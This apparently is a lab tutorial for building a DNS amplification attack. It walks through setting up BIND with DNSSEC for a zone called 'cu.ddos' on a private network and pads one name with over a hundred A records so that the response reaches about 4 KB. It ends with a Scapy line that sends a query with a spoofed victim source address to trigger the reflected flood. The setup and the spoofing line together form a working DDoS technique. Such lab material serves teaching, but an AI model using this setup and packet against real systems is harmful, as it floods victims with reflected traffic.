You should switch to root user to execute following commands
Fedora, CentOS, or Red Hat.
- bind: Domain name server
- bind-utils: some tools related with DNS
- haveged: HArdware Volatile Entropy Gathering and Expansion, a simple entropy daemon to speed up keys generation (DNSSEC Keys Generation)
sudo yum/dnf install bind bind-utils haveged
# enable and start haveged
systemctl enable haveged
systemctl start haveged
# enable and start bind DNS
systemctl enable named
systemctl start namedYou need to check active zone, CentOS uses public, and Fedora uses FedoraWorkstation.
List all:
firewall-cmd --list-allAdd permanent firewall rule for domain name service, and reload the firewalld
firewall-cmd --zone=<your default active zone> --permanent --add-service=dns
firewall-cmd --reloadNow public zone users can access the port 53.
Edit /etc/named.conf change the following line:
option {
listen-on port 53 { any; }
listen-on-v6 port 53 { any; }
allow-query { any; }
}
Execute systemctl reload named to reload settings.
And execute netstat -lptun you should see port 53 listening on the public ip.
Edit /etc/named.conf, and add the following line at the end of the file:
include "/etc/named/named.conf.local";
Create /etc/named/named.conf.local
zone "cu.ddos" {
type master;
file "/etc/named/zones/db.cu.ddos";
};
Execute:
mkdir /etc/named/zones/
touch /etc/named/zones/db.cu.ddosRun named-checkconf to check if the dns config syntax is correct.
If it returns nothing you will be good.
Edit /etc/named/zones/db.cu.ddos (192.168.10.231 is the IP of this DNS Server)
$TTL 604800
@ IN SOA ns1.cu.ddos. admin.cu.ddos. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ; Negative Cache TTL
)
;
; Name servers - NS records
IN NS ns1.cu.ddos.
; Name servers - A records
ns1.cu.ddos. IN A 192.168.10.231
; 192.168.10.0/16 - A records
host1.cu.ddos. IN A 192.168.10.1
host2.cu.ddos. IN A 192.168.10.2
; big host for ddos
bighost.cu.ddos. IN A 192.168.10.1
bighost.cu.ddos. IN A 192.168.10.2
bighost.cu.ddos. IN A 192.168.10.3
bighost.cu.ddos. IN A 192.168.10.4Save it, And run named-checkzone cu.ddos /etc/named/zones/db.cu.ddos you should get:
zone cu.ddos/IN: loaded serial 3
OK
Then reload named by running systemctl reload named
You can test the dns server by execute dig bighost.cu.ddos @DNS_SERVER_IP, for here I will run dig bighost.cu.ddos @192.168.10.231 on other machine in the same network, and I get:
; <<>> DiG 9.10.3-P4-RedHat-9.10.3-9.P4.fc22 <<>> bighost.cu.ddos @192.168.10.231
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24494
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 1, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;bighost.cu.ddos. IN A
;; ANSWER SECTION:
bighost.cu.ddos. 604800 IN A 192.168.10.1
bighost.cu.ddos. 604800 IN A 192.168.10.4
bighost.cu.ddos. 604800 IN A 192.168.10.2
bighost.cu.ddos. 604800 IN A 192.168.10.3
;; AUTHORITY SECTION:
cu.ddos. 604800 IN NS ns1.cu.ddos.
;; ADDITIONAL SECTION:
ns1.cu.ddos. 604800 IN A 192.168.10.231
;; Query time: 1 msec
;; SERVER: 192.168.10.231#53(192.168.10.231)
;; WHEN: Sun Feb 18 20:12:04 EST 2018
;; MSG SIZE rcvd: 142
๐ Step 1 finished.
Now you have:
| Path | Description |
|---|---|
| /etc/named.conf | named global config |
| /etc/named/named.conf.local | named local config |
| /etc/named/zones/db.cu.ddos | cu.ddos zone file |
First, you need to enable DNSSEC, by modifing /etc/named.conf
options {
dnssec-enable yes;
dnssec-validation yes;
dnssec-lookaside auto;
}
Save, Config checking, and reload named.
cd /etc/named/zones/
dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE cu.ddos
dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE cu.ddosNow you will create 4 new files like:
-rw-r--r--. 1 root root 943 Feb 18 14:27 Kcu.ddos.+007+11910.key
-rw-------. 1 root root 3319 Feb 18 14:27 Kcu.ddos.+007+11910.private
-rw-r--r--. 1 root root 598 Feb 18 14:26 Kcu.ddos.+007+42098.key
-rw-------. 1 root root 1779 Feb 18 14:26 Kcu.ddos.+007+42098.private
Execute the following line to add keys in your zone file.
for key in `ls Kcu.ddos*.key`; do echo "\$INCLUDE $key">>db.cu.ddos; doneYour zone file should like:
$TTL 604800
@ IN SOA ns1.cu.ddos. admin.cu.ddos. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ; Negative Cache TTL
)
;
; Name servers - NS records
IN NS ns1.cu.ddos.
; Name servers - A records
ns1.cu.ddos. IN A 192.168.10.231
; 192.168.10.0/16 - A records
host1.cu.ddos. IN A 192.168.10.1
host2.cu.ddos. IN A 192.168.10.2
; big host for ddos
bighost.cu.ddos. IN A 192.168.10.1
bighost.cu.ddos. IN A 192.168.10.2
bighost.cu.ddos. IN A 192.168.10.3
bighost.cu.ddos. IN A 192.168.10.4
$INCLUDE Kcu.ddos.+007+11910.key
$INCLUDE Kcu.ddos.+007+42098.keyJust add some NS records and A records, So when we query bighost.cu.ddos we will get a huge response packet. But if your response packet size > 4096 you will recieve the DNS response by TCP.
$TTL 604800
@ IN SOA ns1.cu.ddos. admin.cu.ddos. (
3 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ; Negative Cache TTL
)
;
; Name servers - NS records
IN NS ns1.cu.ddos.
IN NS ns2.cu.ddos.
IN NS ns3.cu.ddos.
IN NS ns4.cu.ddos.
IN NS ns5.cu.ddos.
IN NS ns6.cu.ddos.
IN NS ns7.cu.ddos.
IN NS ns8.cu.ddos.
; Name servers - A records
ns1.cu.ddos. IN A 192.168.10.231
ns2.cu.ddos. IN A 192.168.10.231
ns3.cu.ddos. IN A 192.168.10.231
ns4.cu.ddos. IN A 192.168.10.231
ns5.cu.ddos. IN A 192.168.10.231
ns6.cu.ddos. IN A 192.168.10.231
ns7.cu.ddos. IN A 192.168.10.231
ns8.cu.ddos. IN A 192.168.10.231
; 192.168.10.0/16 - A records
host1.cu.ddos. IN A 192.168.10.1
host2.cu.ddos. IN A 192.168.10.2
host3.cu.ddos. IN A 192.168.10.3
host4.cu.ddos. IN A 192.168.10.4
host5.cu.ddos. IN A 192.168.10.5
host6.cu.ddos. IN A 192.168.10.6
host7.cu.ddos. IN A 192.168.10.7
host8.cu.ddos. IN A 192.168.10.8
host9.cu.ddos. IN A 192.168.10.9
host10.cu.ddos. IN A 192.168.10.10
host11.cu.ddos. IN A 192.168.10.11
host12.cu.ddos. IN A 192.168.10.12
host13.cu.ddos. IN A 192.168.10.13
host14.cu.ddos. IN A 192.168.10.14
host15.cu.ddos. IN A 192.168.10.15
host16.cu.ddos. IN A 192.168.10.16
host17.cu.ddos. IN A 192.168.10.17
host18.cu.ddos. IN A 192.168.10.18
host19.cu.ddos. IN A 192.168.10.19
host20.cu.ddos. IN A 192.168.10.20
host21.cu.ddos. IN A 192.168.10.21
host22.cu.ddos. IN A 192.168.10.22
host23.cu.ddos. IN A 192.168.10.23
host24.cu.ddos. IN A 192.168.10.24
host25.cu.ddos. IN A 192.168.10.25
host26.cu.ddos. IN A 192.168.10.26
host27.cu.ddos. IN A 192.168.10.27
host28.cu.ddos. IN A 192.168.10.28
host29.cu.ddos. IN A 192.168.10.29
host30.cu.ddos. IN A 192.168.10.30
; big host for ddos
bighost.cu.ddos. IN A 192.168.10.1
bighost.cu.ddos. IN A 192.168.10.2
bighost.cu.ddos. IN A 192.168.10.3
bighost.cu.ddos. IN A 192.168.10.4
bighost.cu.ddos. IN A 192.168.10.5
bighost.cu.ddos. IN A 192.168.10.6
bighost.cu.ddos. IN A 192.168.10.7
bighost.cu.ddos. IN A 192.168.10.8
bighost.cu.ddos. IN A 192.168.10.9
bighost.cu.ddos. IN A 192.168.10.10
bighost.cu.ddos. IN A 192.168.10.11
bighost.cu.ddos. IN A 192.168.10.12
bighost.cu.ddos. IN A 192.168.10.13
bighost.cu.ddos. IN A 192.168.10.14
bighost.cu.ddos. IN A 192.168.10.15
bighost.cu.ddos. IN A 192.168.10.16
bighost.cu.ddos. IN A 192.168.10.17
bighost.cu.ddos. IN A 192.168.10.18
bighost.cu.ddos. IN A 192.168.10.19
bighost.cu.ddos. IN A 192.168.10.20
bighost.cu.ddos. IN A 192.168.10.21
bighost.cu.ddos. IN A 192.168.10.22
bighost.cu.ddos. IN A 192.168.10.23
bighost.cu.ddos. IN A 192.168.10.24
bighost.cu.ddos. IN A 192.168.10.25
bighost.cu.ddos. IN A 192.168.10.26
bighost.cu.ddos. IN A 192.168.10.27
bighost.cu.ddos. IN A 192.168.10.28
bighost.cu.ddos. IN A 192.168.10.29
bighost.cu.ddos. IN A 192.168.10.30
bighost.cu.ddos. IN A 192.168.10.31
bighost.cu.ddos. IN A 192.168.10.32
bighost.cu.ddos. IN A 192.168.10.33
bighost.cu.ddos. IN A 192.168.10.41
bighost.cu.ddos. IN A 192.168.10.42
bighost.cu.ddos. IN A 192.168.10.43
bighost.cu.ddos. IN A 192.168.10.44
bighost.cu.ddos. IN A 192.168.10.45
bighost.cu.ddos. IN A 192.168.10.46
bighost.cu.ddos. IN A 192.168.10.47
bighost.cu.ddos. IN A 192.168.10.48
bighost.cu.ddos. IN A 192.168.10.49
bighost.cu.ddos. IN A 192.168.10.50
bighost.cu.ddos. IN A 192.168.10.51
bighost.cu.ddos. IN A 192.168.10.52
bighost.cu.ddos. IN A 192.168.10.53
bighost.cu.ddos. IN A 192.168.10.54
bighost.cu.ddos. IN A 192.168.10.55
bighost.cu.ddos. IN A 192.168.10.56
bighost.cu.ddos. IN A 192.168.10.57
bighost.cu.ddos. IN A 192.168.10.58
bighost.cu.ddos. IN A 192.168.10.59
bighost.cu.ddos. IN A 192.168.10.60
bighost.cu.ddos. IN A 192.168.10.61
bighost.cu.ddos. IN A 192.168.10.62
bighost.cu.ddos. IN A 192.168.10.63
bighost.cu.ddos. IN A 192.168.10.64
bighost.cu.ddos. IN A 192.168.10.65
bighost.cu.ddos. IN A 192.168.10.66
bighost.cu.ddos. IN A 192.168.10.67
bighost.cu.ddos. IN A 192.168.10.68
bighost.cu.ddos. IN A 192.168.10.69
bighost.cu.ddos. IN A 192.168.10.70
bighost.cu.ddos. IN A 192.168.10.71
bighost.cu.ddos. IN A 192.168.10.72
bighost.cu.ddos. IN A 192.168.10.73
bighost.cu.ddos. IN A 192.168.10.74
bighost.cu.ddos. IN A 192.168.10.75
bighost.cu.ddos. IN A 192.168.10.76
bighost.cu.ddos. IN A 192.168.10.77
bighost.cu.ddos. IN A 192.168.10.78
bighost.cu.ddos. IN A 192.168.10.79
bighost.cu.ddos. IN A 192.168.10.80
bighost.cu.ddos. IN A 192.168.10.81
bighost.cu.ddos. IN A 192.168.10.82
bighost.cu.ddos. IN A 192.168.10.83
bighost.cu.ddos. IN A 192.168.10.84
bighost.cu.ddos. IN A 192.168.10.85
bighost.cu.ddos. IN A 192.168.10.86
bighost.cu.ddos. IN A 192.168.10.87
bighost.cu.ddos. IN A 192.168.10.88
bighost.cu.ddos. IN A 192.168.10.89
bighost.cu.ddos. IN A 192.168.10.90
bighost.cu.ddos. IN A 192.168.10.91
bighost.cu.ddos. IN A 192.168.10.92
bighost.cu.ddos. IN A 192.168.10.93
bighost.cu.ddos. IN A 192.168.10.94
bighost.cu.ddos. IN A 192.168.10.95
bighost.cu.ddos. IN A 192.168.10.96
bighost.cu.ddos. IN A 192.168.10.97
bighost.cu.ddos. IN A 192.168.10.98
bighost.cu.ddos. IN A 192.168.10.99
bighost.cu.ddos. IN A 192.168.10.100
bighost.cu.ddos. IN A 192.168.10.101
bighost.cu.ddos. IN A 192.168.10.102
bighost.cu.ddos. IN A 192.168.10.103
bighost.cu.ddos. IN A 192.168.10.104
bighost.cu.ddos. IN A 192.168.10.105
bighost.cu.ddos. IN A 192.168.10.106
bighost.cu.ddos. IN A 192.168.10.107
bighost.cu.ddos. IN A 192.168.10.108
bighost.cu.ddos. IN A 192.168.10.109
bighost.cu.ddos. IN A 192.168.10.110
bighost.cu.ddos. IN A 192.168.10.111
bighost.cu.ddos. IN A 192.168.10.112
bighost.cu.ddos. IN A 192.168.10.113
bighost.cu.ddos. IN A 192.168.10.114
bighost.cu.ddos. IN A 192.168.10.115
bighost.cu.ddos. IN A 192.168.10.116
bighost.cu.ddos. IN A 192.168.10.117
bighost.cu.ddos. IN A 192.168.10.118
bighost.cu.ddos. IN A 192.168.10.119
bighost.cu.ddos. IN A 192.168.10.120
bighost.cu.ddos. IN A 192.168.10.121
bighost.cu.ddos. IN A 192.168.10.122
bighost.cu.ddos. IN A 192.168.10.123
bighost.cu.ddos. IN A 192.168.10.124
bighost.cu.ddos. IN A 192.168.10.125
bighost.cu.ddos. IN A 192.168.10.126
bighost.cu.ddos. IN A 192.168.10.127
bighost.cu.ddos. IN A 192.168.10.128
bighost.cu.ddos. IN A 192.168.10.129
bighost.cu.ddos. IN A 192.168.10.100
bighost.cu.ddos. IN A 192.168.10.101
bighost.cu.ddos. IN A 192.168.10.102
bighost.cu.ddos. IN A 192.168.10.103
bighost.cu.ddos. IN A 192.168.10.104
bighost.cu.ddos. IN A 192.168.10.105
bighost.cu.ddos. IN A 192.168.10.106
bighost.cu.ddos. IN A 192.168.10.107
bighost.cu.ddos. IN A 192.168.10.108
bighost.cu.ddos. IN A 192.168.10.109
bighost.cu.ddos. IN A 192.168.10.110
bighost.cu.ddos. IN A 192.168.10.111
bighost.cu.ddos. IN A 192.168.10.112
bighost.cu.ddos. IN A 192.168.10.113
bighost.cu.ddos. IN A 192.168.10.114
bighost.cu.ddos. IN A 192.168.10.115
bighost.cu.ddos. IN A 192.168.10.116
bighost.cu.ddos. IN A 192.168.10.117
bighost.cu.ddos. IN A 192.168.10.118
bighost.cu.ddos. IN A 192.168.10.119
bighost.cu.ddos. IN A 192.168.10.120
bighost.cu.ddos. IN A 192.168.10.121
bighost.cu.ddos. IN A 192.168.10.122
bighost.cu.ddos. IN A 192.168.10.123
bighost.cu.ddos. IN A 192.168.10.124
bighost.cu.ddos. IN A 192.168.10.125
bighost.cu.ddos. IN A 192.168.10.126
bighost.cu.ddos. IN A 192.168.10.127
bighost.cu.ddos. IN A 192.168.10.128
bighost.cu.ddos. IN A 192.168.10.129
$INCLUDE Kcu.ddos.+007+11910.key
$INCLUDE Kcu.ddos.+007+42098.keyExecute:
cd /etc/named/zones/
dnssec-signzone -A -3 $(head -c 1000 /dev/random | sha1sum | cut -b 1-16) -N INCREMENT -o cu.ddos -t db.cu.ddosYou will get:
Verifying the zone using the following algorithms: NSEC3RSASHA1.
Zone fully signed:
Algorithm: NSEC3RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked
ZSKs: 1 active, 0 stand-by, 0 revoked
db.cu.ddos.signed
Signatures generated: 84
Signatures retained: 0
Signatures dropped: 0
Signatures successfully verified: 0
Signatures unsuccessfully verified: 0
Signing time in seconds: 0.120
Signatures per second: 699.556
Runtime in seconds: 0.143
And two new files:
-rw-r--r--. 1 root root 54086 Feb 18 20:50 db.cu.ddos.signed
-rw-r--r--. 1 root root 159 Feb 18 20:50 dsset-cu.ddos.
Modify the named local config /etc/named/named.conf.local
zone "cu.ddos" {
type master;
file "/etc/named/zones/db.cu.ddos.signed";
};
Reload named:
systemctl reload namedYou can try to execute dig command to test it, here I used my DNS Server IP:
dig bighost.cu.ddos @192.168.10.231 +dnssecExample Output:
; <<>> DiG 9.10.3-P4-RedHat-9.10.3-9.P4.fc22 <<>> bighost.cu.ddos @192.168.10.231 +dnssec
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45291
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 123, AUTHORITY: 9, ADDITIONAL: 13
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;bighost.cu.ddos. IN A
;; ANSWER SECTION:
bighost.cu.ddos. 604800 IN A 192.168.10.61
bighost.cu.ddos. 604800 IN A 192.168.10.10
bighost.cu.ddos. 604800 IN A 192.168.10.2
bighost.cu.ddos. 604800 IN A 192.168.10.51
bighost.cu.ddos. 604800 IN A 192.168.10.31
bighost.cu.ddos. 604800 IN A 192.168.10.4
bighost.cu.ddos. 604800 IN A 192.168.10.120
bighost.cu.ddos. 604800 IN A 192.168.10.21
bighost.cu.ddos. 604800 IN A 192.168.10.32
bighost.cu.ddos. 604800 IN A 192.168.10.12
bighost.cu.ddos. 604800 IN A 192.168.10.43
bighost.cu.ddos. 604800 IN A 192.168.10.111
bighost.cu.ddos. 604800 IN A 192.168.10.24
bighost.cu.ddos. 604800 IN A 192.168.10.97
bighost.cu.ddos. 604800 IN A 192.168.10.100
bighost.cu.ddos. 604800 IN A 192.168.10.19
bighost.cu.ddos. 604800 IN A 192.168.10.56
bighost.cu.ddos. 604800 IN A 192.168.10.52
bighost.cu.ddos. 604800 IN A 192.168.10.99
bighost.cu.ddos. 604800 IN A 192.168.10.95
bighost.cu.ddos. 604800 IN A 192.168.10.98
bighost.cu.ddos. 604800 IN A 192.168.10.129
bighost.cu.ddos. 604800 IN A 192.168.10.87
bighost.cu.ddos. 604800 IN A 192.168.10.14
bighost.cu.ddos. 604800 IN A 192.168.10.6
bighost.cu.ddos. 604800 IN A 192.168.10.49
bighost.cu.ddos. 604800 IN A 192.168.10.9
bighost.cu.ddos. 604800 IN A 192.168.10.122
bighost.cu.ddos. 604800 IN A 192.168.10.76
bighost.cu.ddos. 604800 IN A 192.168.10.73
bighost.cu.ddos. 604800 IN A 192.168.10.17
bighost.cu.ddos. 604800 IN A 192.168.10.92
bighost.cu.ddos. 604800 IN A 192.168.10.102
bighost.cu.ddos. 604800 IN A 192.168.10.116
bighost.cu.ddos. 604800 IN A 192.168.10.74
bighost.cu.ddos. 604800 IN A 192.168.10.41
bighost.cu.ddos. 604800 IN A 192.168.10.85
bighost.cu.ddos. 604800 IN A 192.168.10.86
bighost.cu.ddos. 604800 IN A 192.168.10.55
bighost.cu.ddos. 604800 IN A 192.168.10.112
bighost.cu.ddos. 604800 IN A 192.168.10.72
bighost.cu.ddos. 604800 IN A 192.168.10.62
bighost.cu.ddos. 604800 IN A 192.168.10.66
bighost.cu.ddos. 604800 IN A 192.168.10.22
bighost.cu.ddos. 604800 IN A 192.168.10.30
bighost.cu.ddos. 604800 IN A 192.168.10.93
bighost.cu.ddos. 604800 IN A 192.168.10.105
bighost.cu.ddos. 604800 IN A 192.168.10.57
bighost.cu.ddos. 604800 IN A 192.168.10.128
bighost.cu.ddos. 604800 IN A 192.168.10.13
bighost.cu.ddos. 604800 IN A 192.168.10.18
bighost.cu.ddos. 604800 IN A 192.168.10.106
bighost.cu.ddos. 604800 IN A 192.168.10.25
bighost.cu.ddos. 604800 IN A 192.168.10.58
bighost.cu.ddos. 604800 IN A 192.168.10.44
bighost.cu.ddos. 604800 IN A 192.168.10.84
bighost.cu.ddos. 604800 IN A 192.168.10.81
bighost.cu.ddos. 604800 IN A 192.168.10.110
bighost.cu.ddos. 604800 IN A 192.168.10.108
bighost.cu.ddos. 604800 IN A 192.168.10.109
bighost.cu.ddos. 604800 IN A 192.168.10.29
bighost.cu.ddos. 604800 IN A 192.168.10.64
bighost.cu.ddos. 604800 IN A 192.168.10.60
bighost.cu.ddos. 604800 IN A 192.168.10.82
bighost.cu.ddos. 604800 IN A 192.168.10.83
bighost.cu.ddos. 604800 IN A 192.168.10.47
bighost.cu.ddos. 604800 IN A 192.168.10.123
bighost.cu.ddos. 604800 IN A 192.168.10.88
bighost.cu.ddos. 604800 IN A 192.168.10.23
bighost.cu.ddos. 604800 IN A 192.168.10.119
bighost.cu.ddos. 604800 IN A 192.168.10.1
bighost.cu.ddos. 604800 IN A 192.168.10.114
bighost.cu.ddos. 604800 IN A 192.168.10.54
bighost.cu.ddos. 604800 IN A 192.168.10.125
bighost.cu.ddos. 604800 IN A 192.168.10.27
bighost.cu.ddos. 604800 IN A 192.168.10.127
bighost.cu.ddos. 604800 IN A 192.168.10.113
bighost.cu.ddos. 604800 IN A 192.168.10.75
bighost.cu.ddos. 604800 IN A 192.168.10.67
bighost.cu.ddos. 604800 IN A 192.168.10.77
bighost.cu.ddos. 604800 IN A 192.168.10.28
bighost.cu.ddos. 604800 IN A 192.168.10.3
bighost.cu.ddos. 604800 IN A 192.168.10.124
bighost.cu.ddos. 604800 IN A 192.168.10.7
bighost.cu.ddos. 604800 IN A 192.168.10.5
bighost.cu.ddos. 604800 IN A 192.168.10.107
bighost.cu.ddos. 604800 IN A 192.168.10.89
bighost.cu.ddos. 604800 IN A 192.168.10.42
bighost.cu.ddos. 604800 IN A 192.168.10.50
bighost.cu.ddos. 604800 IN A 192.168.10.26
bighost.cu.ddos. 604800 IN A 192.168.10.70
bighost.cu.ddos. 604800 IN A 192.168.10.79
bighost.cu.ddos. 604800 IN A 192.168.10.104
bighost.cu.ddos. 604800 IN A 192.168.10.48
bighost.cu.ddos. 604800 IN A 192.168.10.80
bighost.cu.ddos. 604800 IN A 192.168.10.103
bighost.cu.ddos. 604800 IN A 192.168.10.20
bighost.cu.ddos. 604800 IN A 192.168.10.33
bighost.cu.ddos. 604800 IN A 192.168.10.69
bighost.cu.ddos. 604800 IN A 192.168.10.96
bighost.cu.ddos. 604800 IN A 192.168.10.63
bighost.cu.ddos. 604800 IN A 192.168.10.8
bighost.cu.ddos. 604800 IN A 192.168.10.68
bighost.cu.ddos. 604800 IN A 192.168.10.45
bighost.cu.ddos. 604800 IN A 192.168.10.94
bighost.cu.ddos. 604800 IN A 192.168.10.118
bighost.cu.ddos. 604800 IN A 192.168.10.78
bighost.cu.ddos. 604800 IN A 192.168.10.91
bighost.cu.ddos. 604800 IN A 192.168.10.16
bighost.cu.ddos. 604800 IN A 192.168.10.15
bighost.cu.ddos. 604800 IN A 192.168.10.11
bighost.cu.ddos. 604800 IN A 192.168.10.46
bighost.cu.ddos. 604800 IN A 192.168.10.121
bighost.cu.ddos. 604800 IN A 192.168.10.115
bighost.cu.ddos. 604800 IN A 192.168.10.101
bighost.cu.ddos. 604800 IN A 192.168.10.71
bighost.cu.ddos. 604800 IN A 192.168.10.90
bighost.cu.ddos. 604800 IN A 192.168.10.53
bighost.cu.ddos. 604800 IN A 192.168.10.65
bighost.cu.ddos. 604800 IN A 192.168.10.126
bighost.cu.ddos. 604800 IN A 192.168.10.117
bighost.cu.ddos. 604800 IN A 192.168.10.59
bighost.cu.ddos. 604800 IN RRSIG A 7 3 604800 20180321005021 20180219005021 42098 cu.ddos. maLqAba6ty7t7FGVs4wBR7VdjElF9gnoVJBqNnBH0dGRsuyYujv6Yhsx InSmQx3E23p7nTshIlUSodkVJRAXOq+YoYXvxqWDRChq6UeMltXgoU1V ov808EnX+Br4tHriIIBo/aEM9XF/SDzf1MOHyiTbBONFuwcj2Gr/LqiT pRZXGzvN4VmBUqBZ7+KnqKkExhUm1Fs3MkH/b4jp2UiHF51ZwIWOF97b 37/c4ci8iYXHKFWeSQzjJXVJ8fmEbumOVcGMNGHSEXwIKxuDjQ8oC5qb WaLrl2BAF2SHqSMZy/6z80oc+P4UjMdy7NVSt8Ek+65XnxmvzMpb3vNX 8qgblw==
;; AUTHORITY SECTION:
cu.ddos. 604800 IN NS ns4.cu.ddos.
cu.ddos. 604800 IN NS ns5.cu.ddos.
cu.ddos. 604800 IN NS ns1.cu.ddos.
cu.ddos. 604800 IN NS ns7.cu.ddos.
cu.ddos. 604800 IN NS ns6.cu.ddos.
cu.ddos. 604800 IN NS ns8.cu.ddos.
cu.ddos. 604800 IN NS ns2.cu.ddos.
cu.ddos. 604800 IN NS ns3.cu.ddos.
cu.ddos. 604800 IN RRSIG NS 7 2 604800 20180321005021 20180219005021 42098 cu.ddos. cC4sOu9h729IvsxQWKhtbSHKiceCgGYR+ErnEOyBE+2QW28bBFrPs95E SqKVjfuNepo1BzOfFRP5xS0aN9JgSpAC9Dk8ww94BzHczZDIuKLykX+3 a2PzQjDASfIxtjQUinZPHBxZXN6VKDCSUcFjT4/xGMghjTwFAAfmBd3g Wtr6b1y35LCUxXdoPDh5dgz9HNpcGkxseLbnqTM3lJTGeqUheuJAMiMb eDxbC6univcX4iIe+INnkzm2mphV9bvfOLJiK7H6W/8UPbPtMmXPVuOs tOIDsLyEgU2pFjtSylVCoiPmY34rCjFFK4oHm5spHIi2LLG+8DCeKMdx ykJZ+A==
;; ADDITIONAL SECTION:
ns1.cu.ddos. 604800 IN A 192.168.10.231
ns2.cu.ddos. 604800 IN A 192.168.10.231
ns3.cu.ddos. 604800 IN A 192.168.10.231
ns4.cu.ddos. 604800 IN A 192.168.10.231
ns5.cu.ddos. 604800 IN A 192.168.10.231
ns6.cu.ddos. 604800 IN A 192.168.10.231
ns7.cu.ddos. 604800 IN A 192.168.10.231
ns8.cu.ddos. 604800 IN A 192.168.10.231
ns1.cu.ddos. 604800 IN RRSIG A 7 3 604800 20180321005021 20180219005021 42098 cu.ddos. KicpprFjxOZK5fYmldb9CCtYIkwCaYzsO21Gcyqoi2QFUOj//Ly02lR0 wkBXJOAeP1+3Od53PbET8A9mN8upJl31st7PIa63f5RVxrwVnGVfpujc efxGIdHJ/ZWsP2VWeK+AjDn5JS8OI0HG4N7DeblzKOJsfGki/nH5P44z zRkZ59XEYPUPN4uFpcd+1opBwn44FgZ2o9qceH031zWsUtHhvR+dlyLn 9iGhCGaY8rl/MCDVOI8f8rOI5ohL3VWsBg9iQ1Fd/qhjPBOVEM+ZSvHb 3PBwPAFF9aT/paZ5pIfTVPCDRXGljRz9FbzmrQmoTvzSmP2i5HVv8ywi xho/Tg==
ns2.cu.ddos. 604800 IN RRSIG A 7 3 604800 20180321005021 20180219005021 42098 cu.ddos. Ewe0QZfWJY0Mk/nRi6MNcilmtdburzWWDcmlRyAJex8WtAANp6JrW/FP Di59wvTTXItnXcmeZiS9LDU+JYlQbslon7QX/2vgsS/yp5px4exxvrZQ Kmy8y2h5sKzlenZB3yQ6NdqR5vzPFKJ0DSiRsP0D43gRR5bD+NMV6DFO fD3fZ0ZG20kMZbjqQ4uKq0X2UOi6X106wdXFex+uytIUkKrAB3blvVrk T2XgkxJx9AlDfXGAfEVPbgQmXBS65pwI3Ww8TZ7QerRWnE+7fH9EYiw7 7rpz20D6lCF1Z9CSjMWyA03gcECuaKBKrOWybTKqlMJvIdwAVjVridus 2JWv2A==
ns3.cu.ddos. 604800 IN RRSIG A 7 3 604800 20180321005021 20180219005021 42098 cu.ddos. SzmhAEEPpXtN7cbTkLZ1l2mu+f2nr9NL4NIBnTta2anylbH6rUgdHqO5 mOQM/Bwlb5qqMgw+ljRvPfxITeKzlFuEAGmOnzCd7JMjdbh/Kha7vwJj BlNfNiZHL+6E449+iuY9bk7Be8TKkg5dWcK8D5z4Q4vM8H4FqFgdkSvt to5Nm7U1CBVR8OFE7NGdmjdXVW0CuA4indFGW8HNTzex8NECe5ncBwWr 2bQ53WOqdMglz2PKHqdx8XW9XWvDJ9P/zGYCIl5ibPgl+PneZ4eNcZfR TkwNPFDPTTtboHKEQcwXK0SgeNp+aLv7PeiYi70xw4UEGkBfAkUIheV8 Ca3PlQ==
ns4.cu.ddos. 604800 IN RRSIG A 7 3 604800 20180321005021 20180219005021 42098 cu.ddos. E9jdN4j8tYH4fZMeYnFlhJ5qOaQVFKKgCl76x8dTjh2QJ+awPh4F+Ma7 uOPE4FwDR0FEuHIOUzb0KSUeTmbbe1tfso3tMqUtlKJuA5IljNzi387t UUZpneFI8EXigX5RODgPScEVpTJWgkTaqTKhFUHfGfXTdC0YXc6Uqfxs g8uobz2bnba57IltVtspWnfgJNXy6egM8I8up4mPOZs6w8cn6iIYxGvh +3U9wmUX2j9RbfhnD7QPso0kSpdl6v9joAZzqAslVU6vcXLxdvU5ndtF HABB5+TMB+eodrUOMSXUHWtO7bbkEU/QKmUFaX4eUOi7uE+MudITVl77 jGox5g==
;; Query time: 1 msec
;; SERVER: 192.168.10.231#53(192.168.10.231)
;; WHEN: Sun Feb 18 20:57:17 EST 2018
;; MSG SIZE rcvd: 4038
๐ You recieved the huge dns response packet with the length 4038
send(IP(src=victimIP, dst=dnsServerIP)/UDP(dport=53)/DNS(qd=DNSQR(qname="bighost.cu.ddos"),ar=DNSRR(rrname=".", type=41, rclass=4096, ttl=32768)))
- How To Configure BIND as a Private Network DNS Server on CentOS 7 URL: https://www.digitalocean.com/community/tutorials/how-to-configure-bind-as-a-private-network-dns-server-on-centos-7
- How To Setup DNSSEC on an Authoritative BIND DNS Server URL: https://www.digitalocean.com/community/tutorials/how-to-setup-dnssec-on-an-authoritative-bind-dns-server--2